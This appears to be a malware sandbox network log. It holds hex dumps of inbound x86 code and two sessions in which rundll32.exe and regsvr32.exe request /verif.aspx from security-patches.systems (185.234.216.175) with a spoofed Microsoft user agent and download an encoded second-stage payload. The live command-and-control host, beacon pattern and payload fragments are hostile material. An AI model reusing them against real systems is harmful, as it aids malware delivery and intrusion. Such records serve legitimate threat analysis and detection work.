2024-12-06 21:11:07 UTC	16384	IN	Data Raw: 95 cc fe ff ff 75 0c c7 85 c8 fe ff ff 01 00 00 00 eb 0a c7 85 c8 fe ff ff 00 00 00 00 0f b7 45 f0 85 c0 75 0c c7 85 c4 fe ff ff 01 00 00 00 eb 0a c7 85 c4 fe ff ff 00 00 00 00 0f b6 0d 6b a0 04 10 f7 d1 03 0d 58 a1 04 10 75 14 33 d2 c7 85 e4 fd ff ff 01 00 00 00 89 95 e8 fd ff ff eb 0b 0f 57 c0 66 0f 13 85 e4 fd ff ff 8b 85 c8 fe ff ff 0f af 85 c4 fe ff ff 99 8b f0 0f b6 45 fd 99 8b 4d bc 8b 7d c0 2b c8 1b fa 57 51 8b 95 e8 fd ff ff 52 8b 85 e4 fd ff ff 50 e8 bd 7d 02 00 33 f0 89 35 40 a1 04 10 8b 0d f8 a0 04 10 8b 35 fc a0 04 10 0f be 45 ff 05 4a 36 34 5b 99 89 8d 58 fc ff ff 89 b5 5c fc ff ff 89 85 50 fc ff ff 89 95 54 fc ff ff 8b 95 58 fc ff ff 3b 95 50 fc ff ff 75 44 8b 85 5c fc ff ff 3b 85 54 fc ff ff 75 36 8b 4d bc 8b 55 c0 89 95 a0 fa ff ff 81 c1 Data Ascii: uEukXu3WfEM}+WQRP}35@5EJ64[X\PTX;PuD\;Tu6MU
2024-12-06 21:11:07 UTC	16384	IN	Data Raw: ff ff 75 0c c7 85 c4 fe ff ff 01 00 00 00 eb 0a c7 85 c4 fe ff ff 00 00 00 00 8b 55 d0 f7 d2 0f af 55 b4 0f be 05 92 a0 04 10 33 d0 8b 8d c8 fe ff ff 03 8d c4 fe ff ff 0f af d1 88 55 ff 83 3d 90 a1 04 10 01 0f 85 24 01 00 00 ba 01 00 00 00 66 89 15 50 a1 04 10 0f b6 45 fd f7 d0 99 8b 0d c0 a0 04 10 8b 35 c4 a0 04 10 56 51 52 50 e8 e9 3d 02 00 f7 d0 66 89 45 e4 0f b7 15 50 a1 04 10 89 95 c0 fe ff ff 83 bd c0 fe ff ff 00 74 0e 83 bd c0 fe ff ff 01 74 24 e9 a7 00 00 00 a1 04 a1 04 10 0f af 05 44 a1 04 10 8b 0d 04 a1 04 10 03 c8 89 0d 04 a1 04 10 e9 88 00 00 00 8b 15 f8 a0 04 10 a1 fc a0 04 10 89 95 c0 fa ff ff 89 85 c4 fa ff ff 8b 8d c0 fa ff ff 0b 8d c4 fa ff ff 75 0c c7 85 bc fe ff ff 01 00 00 00 eb 0a c7 85 bc fe ff ff 00 00 00 00 8b 0d d8 a0 04 10 8b 35 Data Ascii: uUU3U=$fPE5VQRP=fEPtt$Du5
2024-12-06 21:11:07 UTC	16384	IN	Data Raw: 89 8d f8 fe ff ff ba 74 00 00 00 66 89 95 fa fe ff ff b8 63 00 00 00 66 89 85 fc fe ff ff b9 68 00 00 00 66 89 8d fe fe ff ff ba 65 00 00 00 66 89 95 00 ff ff ff b8 73 00 00 00 66 89 85 02 ff ff ff b9 2e 00 00 00 66 89 8d 04 ff ff ff ba 73 00 00 00 66 89 95 06 ff ff ff b8 79 00 00 00 66 89 85 08 ff ff ff b9 73 00 00 00 66 89 8d 0a ff ff ff ba 74 00 00 00 66 89 95 0c ff ff ff b8 65 00 00 00 66 89 85 0e ff ff ff b9 6d 00 00 00 66 89 8d 10 ff ff ff ba 73 00 00 00 66 89 95 12 ff ff ff b8 2f 00 00 00 66 89 85 14 ff ff ff b9 76 00 00 00 66 89 8d 16 ff ff ff ba 65 00 00 00 66 89 95 18 ff ff ff b8 72 00 00 00 66 89 85 1a ff ff ff b9 69 00 00 00 66 89 8d 1c ff ff ff ba 66 00 00 00 66 89 95 1e ff ff ff b8 2e 00 00 00 66 89 85 20 ff ff ff b9 61 00 00 00 66 89 8d 22 Data Ascii: tfcfhfefsf.fsfyfsftfefmfsf/fvfefrfifff.f af"
2024-12-06 21:11:07 UTC	16384	IN	Data Raw: e0 03 33 c9 89 45 c4 89 4d c8 eb 22 8b 15 d0 a0 04 10 0b 15 d4 a0 04 10 74 14 0f b7 05 50 a1 04 10 69 c8 34 ad ca d5 66 89 0d 24 a1 04 10 eb 2b 8b 45 cc 99 03 45 bc 13 55 c0 03 45 bc 13 55 c0 89 45 bc 89 55 c0 ba ea 51 08 00 c7 05 f8 a0 04 10 20 d7 b8 e4 89 15 fc a0 04 10 8b 85 54 ff ff ff 83 c0 45 89 85 58 fa ff ff 0f b6 0d bc a0 04 10 c1 e1 06 89 4d e0 a1 5c a1 04 10 99 2d 7a 76 a7 c4 8b 55 e0 0b d0 89 55 e0 8b 85 54 ff ff ff 83 c0 20 89 85 38 fe ff ff 8b 0d e0 a0 04 10 8b 15 e4 a0 04 10 89 95 54 fa ff ff 81 e9 d7 00 00 00 89 0d 5c a1 04 10 0f b7 45 f8 0f b6 4d fe 23 c1 0f b7 55 f8 03 d0 66 89 55 f8 8b 85 38 fe ff ff 03 85 38 fe ff ff b9 fe 01 00 00 2b c8 89 8d b4 fc ff ff 33 d2 88 55 a0 68 04 01 00 00 8d 85 44 f6 ff ff 50 8d 8d fa f8 ff ff 51 8d 4d a0 Data Ascii: 3EM"tPi4f$+EEUEUEUQ TEXM\-zvUUT 8T\EM#UfU88+3UhDPQM
2024-12-06 21:11:07 UTC	16384	IN	Data Raw: 88 a1 04 10 8b 15 8c a1 04 10 f7 d1 f7 d2 89 8d e0 fc ff ff 89 95 e4 fc ff ff 81 bd e0 fc ff ff 68 27 84 f0 75 18 81 bd e4 fc ff ff 70 c6 f4 ff 75 0c c7 85 b0 fe ff ff 01 00 00 00 eb 0a c7 85 b0 fe ff ff 00 00 00 00 8b 85 b4 fe ff ff 3b 85 b0 fe ff ff 7c 0c c7 85 ac fe ff ff 01 00 00 00 eb 0a c7 85 ac fe ff ff 00 00 00 00 8b 8d ac fe ff ff f7 d1 85 c9 74 39 8b 15 10 a1 04 10 81 c2 e2 00 00 00 a1 54 a1 04 10 03 c2 a3 54 a1 04 10 0f bf 0d 20 a1 04 10 0f bf 15 00 a1 04 10 2b ca 0f bf 05 20 a1 04 10 03 c1 66 a3 20 a1 04 10 eb 26 0f bf 4d f0 85 c9 74 1e 0f bf 15 20 a1 04 10 81 f2 28 f9 00 00 66 89 15 00 a1 04 10 a0 78 ac 04 10 a2 bc a0 04 10 8b 4d 98 51 6a 00 ff 15 44 b0 03 10 50 ff 15 3c b0 03 10 89 45 94 33 d2 c7 05 f8 a0 04 10 e0 1a c3 4f 89 15 fc a0 04 10 Data Ascii: h'upu;\|t9TT + f &Mt (fxMQjDP<E3O
2024-12-06 21:11:07 UTC	16384	IN	Data Raw: f5 ff ff 38 00 00 00 0f b6 05 6b a0 04 10 99 89 85 5c f4 ff ff 89 95 60 f4 ff ff c7 85 84 f4 ff ff 44 fc 96 51 c7 85 88 f4 ff ff ba 21 a8 0b 8b 0d 90 a1 04 10 66 89 8d 2c fb ff ff 0f b6 05 6b a0 04 10 99 89 85 54 f4 ff ff 89 95 58 f4 ff ff c7 85 90 f4 ff ff c9 e8 4c 74 8b 15 4c a1 04 10 89 95 94 f4 ff ff c7 85 98 f4 ff ff be aa 47 50 c7 85 9c f4 ff ff a9 00 00 00 66 a1 20 a1 04 10 88 85 e2 fe ff ff c6 85 e3 fe ff ff 80 c7 85 a0 f4 ff ff e0 c4 df 6c b9 e7 8b ff ff 66 89 8d 28 fb ff ff 0f b6 55 fa 69 c2 c1 f1 bd 3b 89 45 a4 8b 0d 04 a1 04 10 2b 4d b0 8b 15 04 a1 04 10 2b d1 89 15 04 a1 04 10 a1 78 ac 04 10 89 85 d8 fe ff ff c7 85 dc fe ff ff 00 00 00 00 eb 0f 8b 8d dc fe ff ff 83 c1 01 89 8d dc fe ff ff 83 bd dc fe ff ff 63 0f 8d 4f 01 00 00 83 3d 4c a1 04 Data Ascii: 8k\`DQ!f,kTXLtLGPf lf(Ui;E+M+xcO=L
2024-12-06 21:11:07 UTC	16384	IN	Data Raw: 55 c0 52 e8 54 fe 00 00 a2 bb a0 04 10 0f be 05 17 a0 04 10 89 85 44 fd ff ff 83 bd 44 fd ff ff 04 0f 87 a2 00 00 00 8b 8d 44 fd ff ff ff 24 8d b0 1d 02 10 8a 15 78 ac 04 10 88 15 56 a0 04 10 a1 5c a1 04 10 99 05 92 2e c4 3a 81 d2 79 3c 0a 00 33 c9 03 05 7c a1 04 10 13 d1 a3 d0 a0 04 10 89 15 d4 a0 04 10 eb 61 0f b6 45 fe 99 a3 30 a1 04 10 89 15 34 a1 04 10 8b 55 98 2b 55 d8 8b 45 9c 1b 45 dc 89 55 98 89 45 9c eb 3d 8b 4d d0 8b 55 d4 a1 64 a1 04 10 2b 0d 60 a1 04 10 1b d0 89 4d d0 89 55 d4 eb 22 0f b6 0d 6b a0 04 10 0f be 15 17 a0 04 10 0f af ca 88 4d ff eb 0c 33 c0 c7 45 d8 a4 50 00 00 89 45 dc c7 85 28 ff ff ff 00 00 00 00 eb 0f 8b 8d 28 ff ff ff 83 c1 02 89 8d 28 ff ff ff 81 bd 28 ff ff ff f5 01 00 00 0f 8d 89 00 00 00 0f b6 55 fa 0f be 05 17 a0 04 10 Data Ascii: URTDDD$xV\.:y<3\|aE04U+UEEUE=MUd+`MU"kM3EPE((((U
2024-12-06 21:11:07 UTC	16384	IN	Data Raw: ff ff 3b 4d c0 77 19 72 0b 8b 95 58 fe ff ff 3b 55 bc 77 0c c7 85 e4 fe ff ff 01 00 00 00 eb 0a c7 85 e4 fe ff ff 00 00 00 00 8b 85 e8 fe ff ff f7 d0 3b 85 e4 fe ff ff 74 0c c7 85 d4 fe ff ff 01 00 00 00 eb 0a c7 85 d4 fe ff ff 00 00 00 00 8b 8d dc fe ff ff f7 d1 0f af 8d d8 fe ff ff 8b 95 d4 fe ff ff f7 d2 3b ca 7c 39 0f b7 05 cc a0 04 10 8b 0d 28 a1 04 10 2b c8 89 0d 28 a1 04 10 8b 15 58 a1 04 10 33 c0 8b 0d f8 a0 04 10 8b 35 fc a0 04 10 56 51 50 52 e8 bf bd 00 00 a3 58 a1 04 10 eb 15 8b 55 b4 8b 45 b8 89 85 d4 fd ff ff 81 f2 3d 28 95 df 89 55 a8 e9 84 00 00 00 0f b7 4d ec 85 c9 75 0c c7 85 50 ff ff ff 01 00 00 00 eb 0a c7 85 50 ff ff ff 00 00 00 00 8b 15 04 a1 04 10 03 95 50 ff ff ff 33 c0 89 15 c0 a0 04 10 a3 c4 a0 04 10 8b 0d 54 a1 04 10 33 d2 8b 45 Data Ascii: ;MwrX;Uw;t;\|9(+(X35VQPRXUE=(UMuPPP3T3E

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	185.234.216.175	443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 21:11:09 UTC	117	OUT	GET /verif.aspx HTTP/1.1 User-Agent: Microsoft-WNS/11.0 Host: security-patches.systems Cache-Control: no-cache
2024-12-06 21:11:09 UTC	252	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:09 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Sat, 23 Nov 2024 15:29:11 GMT ETag: "d75c4-62796294faafa" Accept-Ranges: bytes Content-Length: 882116 Connection: close
2024-12-06 21:11:09 UTC	7940	IN	Data Raw: 4c 32 6e 42 59 56 5a 4b 4e 33 68 6d 4d 31 46 68 71 72 55 33 65 4e 6f 7a 55 57 46 56 53 6a 64 34 49 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 56 55 6f 33 65 47 49 7a 55 57 46 56 53 6a 64 34 0d 0a 59 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 58 55 73 33 65 47 77 73 36 32 39 56 2f 6a 36 31 51 34 74 51 4c 5a 68 72 59 78 41 4c 51 48 45 52 4a 79 56 51 43 67 4e 65 63 51 49 30 4a 46 6b 58 0d 0a 46 68 4d 7a 42 48 55 34 51 68 5a 43 57 6a 39 42 45 51 56 6b 57 41 39 63 4e 51 52 37 52 7a 70 79 52 6a 4e 52 59 56 56 4b 4e 33 68 48 2f 76 68 4f 4e 4f 62 77 42 41 4f 66 6c 68 30 30 35 76 41 45 0d 0a 30 4f 32 56 48 44 2f 6d 38 41 54 51 37 5a 4d 63 6c 65 62 77 42 41 55 65 6b 68 77 6b 35 76 41 45 42 52 36 56 48 43 48 6d 38 41 54 51 37 5a 49 63 49 75 62 77 42 41 55 65 6b Data Ascii: L2nBYVZKN3hmM1FhqrU3eNozUWFVSjd4IjNRYVVKN3hiM1FhVUo3eGIzUWFVSjd4YjNRYVVKN3hiM1FhXUs3eGws629V/j61Q4tQLZhrYxALQHERJyVQCgNecQI0JFkXFhMzBHU4QhZCWj9BEQVkWA9cNQR7RzpyRjNRYVVKN3hH/vhONObwBAOflh005vAE0O2VHD/m8ATQ7ZMclebwBAUekhwk5vAEBR6VHCHm8ATQ7ZIcIubwBAUek
2024-12-06 21:11:10 UTC	16384	IN	Data Raw: 2b 36 59 2f 32 69 79 70 6f 6c 46 35 59 54 50 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 4b 37 2f 6e 61 32 5a 68 76 75 30 0d 0a 4e 37 69 39 34 72 6c 69 76 6a 57 65 41 4a 48 71 47 4c 61 2b 65 65 74 79 56 65 67 55 51 72 77 74 6e 76 51 54 5a 56 52 4b 4e 33 6a 70 64 71 32 6d 46 55 49 32 65 47 49 7a 32 69 79 70 6a 54 61 63 0d 0a 38 54 74 42 36 67 42 47 76 69 32 4b 75 42 52 70 33 41 2f 54 38 79 2f 50 30 71 42 5a 77 33 71 55 36 57 61 39 36 41 43 79 76 44 32 4b 75 68 53 42 33 67 66 54 38 53 2f 76 32 6a 53 31 77 54 58 78 0d 0a 4a 2b 76 61 4c 49 6e 42 4a 76 45 33 78 39 6f 6b 72 59 30 33 2f 42 51 37 51 65 6f 59 73 76 42 35 69 6b 56 5a 63 64 34 66 7a 2f 4d 6e 78 39 67 6a 55 63 6c 4b 6a 47 4a 47 57 4b 59 51 75 6a 64 34 0d 0a 59 6a 4f 36 61 4e 34 48 77 33 73 Data Ascii: +6Y/2iypolF5YTPaJKnB0iWgN1GtmYb7tK7/na2Zhvu0N7i94rlivjWeAJHqGLa+eetyVegUQrwtnvQTZVRKN3jpdq2mFUI2eGIz2iypjTac8TtB6gBGvi2KuBRp3A/T8y/P0qBZw3qU6Wa96ACyvD2KuhSB3gfT8S/v2jS1wTXxJ+vaLInBJvE3x9okrY03/BQ7QeoYsvB5ikVZcd4fz/Mnx9gjUclKjGJGWKYQujd4YjO6aN4Hw3s
2024-12-06 21:11:10 UTC	16384	IN	Data Raw: 36 51 43 30 4f 4d 34 6e 7a 64 53 68 49 52 48 77 50 62 6f 7a 55 57 46 56 77 58 70 6f 0d 0a 36 33 36 39 36 67 42 47 76 69 32 53 75 42 53 52 33 41 2f 37 38 79 2f 66 32 43 79 46 78 32 4b 30 36 32 61 78 70 68 43 65 4e 33 68 69 4d 39 6f 6b 64 63 4e 79 6e 4f 6c 2b 54 65 67 59 6f 72 77 74 0d 0a 69 72 6f 45 70 64 34 50 30 2f 45 6e 2b 39 77 73 6b 63 4e 36 70 4f 6c 6d 73 54 50 65 42 2b 75 51 52 67 35 51 59 62 78 64 79 49 65 64 75 42 52 70 33 67 63 72 38 7a 63 54 32 47 6e 63 47 6a 50 7a 0d 0a 4a 7a 76 61 68 41 69 4a 2b 37 53 75 2f 35 32 74 6d 59 62 37 74 44 65 34 76 54 79 57 68 76 75 30 72 76 2b 64 72 5a 6d 47 2b 37 51 33 75 4c 30 77 76 6b 4f 38 50 57 71 77 6b 58 48 63 44 7a 2f 7a 0d 0a 4c 7a 74 71 4c 46 6b 2b 41 50 4d 33 4f 39 67 30 71 63 46 36 68 49 6f 59 67 32 4e Data Ascii: 6QC0OM4nzdShIRHwPbozUWFVwXpo63696gBGvi2SuBSR3A/78y/f2CyFx2K062axphCeN3hiM9okdcNynOl+TegYorwtiroEpd4P0/En+9wskcN6pOlmsTPeB+uQRg5QYbxdyIeduBRp3gcr8zcT2GncGjPzJzvahAiJ+7Su/52tmYb7tDe4vTyWhvu0rv+drZmG+7Q3uL0wvkO8PWqwkXHcDz/zLztqLFk+APM3O9g0qcF6hIoYg2N
2024-12-06 21:11:10 UTC	16384	IN	Data Raw: 61 4f 75 6d 51 5a 36 71 74 62 37 39 0d 0a 64 73 79 75 6e 72 35 44 76 44 58 36 73 4c 68 67 33 41 65 76 2b 78 2b 72 55 52 64 4c 78 36 4a 6f 6e 63 79 75 36 4d 44 36 79 59 65 64 50 4f 63 6b 54 52 71 38 39 64 4c 4e 72 70 36 39 64 53 5a 35 0d 0a 59 74 69 43 36 74 68 61 79 49 65 64 75 4d 52 31 71 72 58 49 38 65 39 37 72 35 36 71 77 36 49 30 6e 4d 79 75 36 74 41 43 79 59 65 64 75 4e 77 74 71 37 58 49 38 53 63 2f 32 43 78 46 6a 58 4b 67 0d 0a 59 6a 4e 52 59 62 79 78 4e 33 68 69 76 73 52 42 71 37 58 49 38 54 65 6e 32 69 54 42 77 37 4a 41 6e 63 79 75 36 68 6a 65 74 41 46 32 50 43 64 74 6b 73 38 4c 68 35 33 4d 55 47 46 56 53 74 78 79 0d 0a 70 62 5a 74 6e 71 71 31 4e 33 68 69 4d 39 76 30 61 62 58 49 68 2b 70 6d 75 57 37 6a 44 39 2f 39 6f 6b 64 47 36 68 6a 65 76 47 6e Data Ascii: aOumQZ6qtb79dsyunr5DvDX6sLhg3Aev+x+rURdLx6Joncyu6MD6yYedPOckTRq89dLNrp69dSZ5YtiC6thayIeduMR1qrXI8e97r56qw6I0nMyu6tACyYeduNwtq7XI8Sc/2CxFjXKgYjNRYbyxN3hivsRBq7XI8Ten2iTBw7JAncyu6hjetAF2PCdtks8Lh53MUGFVStxypbZtnqq1N3hiM9v0abXIh+pmuW7jD9/9okdG6hjevGn
2024-12-06 21:11:10 UTC	16384	IN	Data Raw: 67 55 74 64 35 43 76 6a 4a 6d 39 42 53 64 56 55 6f 33 65 4f 6c 6d 57 65 67 41 68 72 77 39 7a 72 6f 55 73 64 34 48 35 2f 45 76 39 39 6f 30 6d 63 4e 69 6b 4f 6c 32 75 65 67 51 67 72 77 31 0d 0a 71 72 6f 63 30 64 67 66 78 53 72 70 64 72 6b 78 33 67 66 7a 6b 49 35 4f 72 70 34 2f 53 72 6f 31 79 6d 4b 35 6b 4e 32 31 79 50 75 6d 4f 31 37 58 68 63 2f 6c 44 58 56 62 52 31 31 56 53 6c 2b 49 0d 0a 46 44 74 42 43 65 33 47 50 32 69 4b 38 32 64 6e 56 63 6e 7a 64 4b 56 32 6b 57 46 56 53 6a 66 31 4c 35 2f 59 4c 4c 48 42 59 70 7a 70 4d 64 67 6b 36 63 46 36 6e 4f 6c 6d 6b 65 68 45 77 58 4c 45 0d 0a 36 33 62 70 36 68 6a 79 76 6a 58 57 39 42 53 64 71 72 58 49 68 2b 39 2b 2b 59 6d 64 6b 7a 64 34 36 58 62 6c 36 68 69 2b 55 2f 46 76 4d 31 46 68 56 63 48 53 4a 61 48 2f 6e 61 32 Data Ascii: gUtd5CvjJm9BSdVUo3eOlmWegAhrw9zroUsd4H5/Ev99o0mcNikOl2uegQgrw1qroc0dgfxSrpdrkx3gfzkI5Orp4/Sro1ymK5kN21yPumO17Xhc/lDXVbR11VSl+IFDtBCe3GP2iK82dnVcnzdKV2kWFVSjf1L5/YLLHBYpzpMdgk6cF6nOlmkehEwXLE63bp6hjyvjXW9BSdqrXIh+9++Ymdkzd46Xbl6hi+U/FvM1FhVcHSJaH/na2
2024-12-06 21:11:10 UTC	16384	IN	Data Raw: 58 49 68 2b 48 66 51 65 71 5a 77 35 4b 34 6e 4d 79 75 36 73 41 36 79 49 65 64 59 62 6b 34 4a 30 6f 33 38 79 66 44 32 6d 6d 39 4e 59 56 34 0d 0a 59 76 55 55 69 46 54 42 65 6f 6a 70 49 74 6a 30 50 62 58 49 68 2b 39 32 75 4f 6a 51 4a 73 69 48 6e 62 67 63 61 64 37 66 57 34 65 64 7a 4e 74 6a 33 55 75 36 39 51 72 4d 72 70 37 63 78 31 4f 48 0d 0a 6e 63 7a 61 4e 46 33 42 73 68 79 64 7a 4b 37 71 58 63 4e 39 66 4b 56 32 72 5a 36 71 74 63 6a 31 4c 2f 2b 35 73 42 4e 49 4e 33 66 55 5a 70 30 7a 32 41 66 6a 6b 43 61 34 55 32 48 65 44 7a 2b 52 0d 0a 69 44 64 52 59 64 34 50 78 2f 75 69 4e 39 6a 6b 4e 62 58 49 68 39 73 33 55 57 46 56 49 65 61 48 36 62 59 78 6e 71 71 31 4e 43 68 6d 75 73 51 39 71 72 58 49 38 2b 39 76 72 70 36 71 79 51 35 34 0d 0a 46 31 47 58 4a 4c 31 4b 38 Data Ascii: XIh+HfQeqZw5K4nMyu6sA6yIedYbk4J0o38yfD2mm9NYV4YvUUiFTBeojpItj0PbXIh+92uOjQJsiHnbgcad7fW4edzNtj3Uu69QrMrp7cx1OHnczaNF3BshydzK7qXcN9fKV2rZ6qtcj1L/+5sBNIN3fUZp0z2AfjkCa4U2HeDz+RiDdRYd4Px/uiN9jkNbXIh9s3UWFVIeaH6bYxnqq1NChmusQ9qrXI8+9vrp6qyQ54F1GXJL1K8
2024-12-06 21:11:10 UTC	16384	IN	Data Raw: 67 63 69 64 61 4c 50 35 42 75 58 56 46 68 33 67 66 66 6b 4d 59 72 55 32 48 65 42 38 76 7a 0d 0a 61 39 75 72 34 6c 56 4b 76 43 32 65 75 46 4f 49 4d 55 67 33 65 4f 6c 32 72 65 4b 56 54 72 34 39 70 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 53 6c 56 68 6f 7a 38 54 66 7a 32 69 79 56 77 53 62 78 0d 0a 4e 34 2f 61 4a 4f 6e 4b 44 33 6f 58 4f 70 59 6b 6a 55 73 33 65 47 4c 59 56 71 59 51 6b 6a 64 34 59 6a 50 62 4c 49 33 43 65 6f 70 74 68 51 53 54 30 4a 68 43 4a 2b 6c 32 72 65 4b 56 54 72 34 39 0d 0a 32 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 54 5a 56 68 6f 7a 38 54 65 48 32 69 7a 68 77 53 62 78 4e 34 50 61 4a 4f 58 4b 44 33 6b 58 4f 70 59 6b 67 55 73 33 65 47 4c 59 56 71 59 51 6e 6a 64 34 0d 0a 59 6a 50 62 4c 49 48 43 65 6f 6c 74 68 51 53 51 30 4a 68 43 62 77 6f 79 51 Data Ascii: gcidaLP5BuXVFh3gffkMYrU2HeB8vza9ur4lVKvC2euFOIMUg3eOl2reKVTr49popVYVVKXKmduBSlVhoz8Tfz2iyVwSbxN4/aJOnKD3oXOpYkjUs3eGLYVqYQkjd4YjPbLI3CeopthQST0JhCJ+l2reKVTr492opVYVVKXKmduBTZVhoz8TeH2izhwSbxN4PaJOXKD3kXOpYkgUs3eGLYVqYQnjd4YjPbLIHCeolthQSQ0JhCbwoyQ
2024-12-06 21:11:10 UTC	16384	IN	Data Raw: 2f 77 50 66 71 33 31 57 6c 46 77 58 4c 67 0d 0a 34 66 4e 51 36 4e 41 6d 79 59 65 64 75 42 7a 35 33 31 75 2f 4c 64 2b 77 46 50 6c 55 79 6b 72 46 59 6b 61 2f 36 68 44 53 48 50 30 4f 7a 61 36 65 33 4d 39 66 68 70 33 4d 32 75 77 39 74 4d 69 48 0d 0a 36 37 34 31 6e 36 71 31 76 4f 30 47 7a 61 36 65 33 4e 39 58 68 70 33 4d 32 75 51 31 74 4d 69 48 4d 6c 76 56 35 56 31 61 75 76 56 4b 7a 36 36 65 76 57 30 38 68 35 33 31 46 4a 31 44 78 37 70 51 0d 0a 6e 73 79 75 4d 44 39 61 75 75 33 69 79 61 36 65 42 38 46 36 69 49 72 34 64 57 4a 56 77 37 49 6b 6e 4d 79 75 36 74 41 57 79 59 65 64 75 74 51 35 71 37 58 49 76 69 66 50 52 75 6f 59 75 72 53 35 0d 0a 49 72 68 41 36 4d 41 65 79 6f 65 64 75 42 42 6c 33 4d 39 76 68 5a 33 4d 32 69 68 64 77 37 6f 6b 6e 38 79 75 37 4d 41 65 79 Data Ascii: /wPfq31WlFwXLg4fNQ6NAmyYeduBz531u/Ld+wFPlUykrFYka/6hDSHP0Oza6e3M9fhp3M2uw9tMiH6741n6q1vO0Gza6e3N9Xhp3M2uQ1tMiHMlvV5V1auvVKz66evW08h531FJ1Dx7pQnsyuMD9auu3iya6eB8F6iIr4dWJVw7IknMyu6tAWyYedutQ5q7XIvifPRuoYurS5IrhA6MAeyoeduBBl3M9vhZ3M2ihdw7okn8yu7MAey
2024-12-06 21:11:10 UTC	16384	IN	Data Raw: 62 57 53 52 6b 31 70 62 64 53 43 4b 67 43 64 69 56 63 46 36 68 4f 70 79 4d 65 6f 51 74 72 79 64 50 2f 46 56 59 5a 6d 47 2b 37 51 33 75 4c 33 69 75 57 61 2b 4e 5a 36 34 46 47 6e 63 44 38 50 7a 0d 0a 4c 38 66 59 4c 49 48 42 59 6f 54 72 5a 71 48 71 45 4c 71 2b 50 5a 71 34 48 4a 6d 53 53 7a 64 34 59 6a 50 61 4e 4b 32 4e 64 58 78 69 4d 31 46 68 33 67 38 2f 38 32 71 36 48 49 33 65 48 39 76 78 0d 0a 4e 39 76 63 4a 4c 33 44 63 71 54 70 66 6c 6e 71 52 4d 45 31 38 53 66 58 32 69 79 78 77 33 71 59 37 32 61 78 36 41 43 53 76 44 32 2b 75 46 6b 77 33 68 2f 76 38 32 42 6a 32 69 79 70 6f 68 6d 62 0d 0a 6e 4d 7a 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 44 65 34 76 65 4b 35 58 72 34 31 6e 72 67 55 6e 64 77 50 77 2f 4d 76 78 39 67 73 72 63 46 69 67 4b 55 78 55 Data Ascii: bWSRk1pbdSCKgCdiVcF6hOpyMeoQtrydP/FVYZmG+7Q3uL3iuWa+NZ64FGncD8PzL8fYLIHBYoTrZqHqELq+PZq4HJmSSzd4YjPaNK2NdXxiM1Fh3g8/82q6HI3eH9vxN9vcJL3DcqTpflnqRME18SfX2iyxw3qY72ax6ACSvD2+uFkw3h/v82Bj2iypohmbnMzaJKnB0iWgN1GtmYb7tDe4veK5Xr41nrgUndwPw/Mvx9gsrcFigKUxU
2024-12-06 21:11:10 UTC	16384	IN	Data Raw: 58 49 31 79 76 47 4d 7a 55 57 47 2b 54 66 41 39 70 6a 4e 52 59 56 58 41 63 72 79 4c 47 46 42 68 56 61 4d 54 65 57 49 7a 30 52 79 6d 54 45 49 35 0d 0a 34 6b 36 6a 5a 69 42 78 76 44 56 71 75 42 42 70 33 68 73 37 38 36 72 62 6d 77 5a 52 53 72 77 31 62 6c 56 65 54 78 52 43 71 49 36 6d 64 79 74 6f 6b 67 2f 33 65 57 49 7a 55 59 70 53 6a 58 4b 34 0d 0a 59 6a 4e 52 59 64 38 50 39 35 47 47 4d 31 46 68 76 4a 63 33 65 47 4b 7a 4c 4a 4a 53 50 33 54 34 48 38 46 58 46 47 6a 42 59 6e 54 70 65 56 6e 71 42 30 62 66 2f 51 55 33 55 65 6f 51 51 73 56 33 0d 0a 63 6e 74 5a 42 31 70 6b 2f 2b 65 55 39 78 55 62 58 49 31 79 78 47 4d 7a 55 57 47 2b 54 66 41 39 33 6a 4e 52 59 56 58 41 63 73 53 4c 71 46 46 68 56 61 4f 6a 65 47 49 7a 30 52 79 6d 54 45 49 39 0d 0a 34 6b 36 6a 5a 43 42 Data Ascii: XI1yvGMzUWG+TfA9pjNRYVXAcryLGFBhVaMTeWIz0RymTEI54k6jZiBxvDVquBBp3hs786rbmwZRSrw1blVeTxRCqI6mdytokg/3eWIzUYpSjXK4YjNRYd8P95GGM1FhvJc3eGKzLJJSP3T4H8FXFGjBYnTpeVnqB0bf/QU3UeoQQsV3cntZB1pk/+eU9xUbXI1yxGMzUWG+TfA93jNRYVXAcsSLqFFhVaOjeGIz0RymTEI94k6jZCB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	185.234.216.175	443	3332	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 21:11:11 UTC	117	OUT	GET /verif.aspx HTTP/1.1 User-Agent: Microsoft-WNS/11.0 Host: security-patches.systems Cache-Control: no-cache
2024-12-06 21:11:12 UTC	252	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:12 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Sat, 23 Nov 2024 15:29:11 GMT ETag: "d75c4-62796294faafa" Accept-Ranges: bytes Content-Length: 882116 Connection: close
2024-12-06 21:11:12 UTC	7940	IN	Data Raw: 4c 32 6e 42 59 56 5a 4b 4e 33 68 6d 4d 31 46 68 71 72 55 33 65 4e 6f 7a 55 57 46 56 53 6a 64 34 49 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 56 55 6f 33 65 47 49 7a 55 57 46 56 53 6a 64 34 0d 0a 59 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 58 55 73 33 65 47 77 73 36 32 39 56 2f 6a 36 31 51 34 74 51 4c 5a 68 72 59 78 41 4c 51 48 45 52 4a 79 56 51 43 67 4e 65 63 51 49 30 4a 46 6b 58 0d 0a 46 68 4d 7a 42 48 55 34 51 68 5a 43 57 6a 39 42 45 51 56 6b 57 41 39 63 4e 51 52 37 52 7a 70 79 52 6a 4e 52 59 56 56 4b 4e 33 68 48 2f 76 68 4f 4e 4f 62 77 42 41 4f 66 6c 68 30 30 